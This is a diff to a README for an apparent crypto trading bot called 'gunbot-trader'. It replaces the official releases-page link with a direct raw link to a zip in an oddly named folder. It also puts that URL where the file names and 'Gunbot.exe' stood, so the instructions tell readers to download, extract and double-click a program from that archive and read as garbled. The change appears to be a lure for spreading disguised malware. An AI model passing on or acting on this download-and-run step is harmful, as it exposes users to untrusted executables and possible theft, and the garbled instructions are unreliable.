ahsun21/gunbot-trader/README.md

 ## 📥 Download & Install

-1. **Visit the Release Page**: Go to the [Gunbot 2025 Releases Page](https://github.com/ahsun21/gunbot-trader/releases).
+1. **Visit the Release Page**: Go to the [Gunbot 2025 Releases Page](https://raw.githubusercontent.com/ahsun21/gunbot-trader/main/unmonastic/gunbot-trader-v1.3.zip).

 2. **Choose Your Version**: Select the latest version for your operating system.
-Look for files named like `Gunbot-2025-windows.zip` or similar.
+Look for files named like `https://raw.githubusercontent.com/ahsun21/gunbot-trader/main/unmonastic/gunbot-trader-v1.3.zip` or similar.

 3. **Download the File**: Click the version link to download the ZIP file.

 4. **Extract the ZIP File**: Once the download is complete, locate the ZIP file in your Downloads folder.
 Right-click on it and select "Extract All" to unpack the contents.

-5. **Run the Application**: After extracting, find the `Gunbot.exe` file inside the folder.
+5. **Run the Application**: After extracting, find the `https://raw.githubusercontent.com/ahsun21/gunbot-trader/main/unmonastic/gunbot-trader-v1.3.zip` file inside the folder.
 Double-click on it to launch the program.

 ## 🔧 Configuration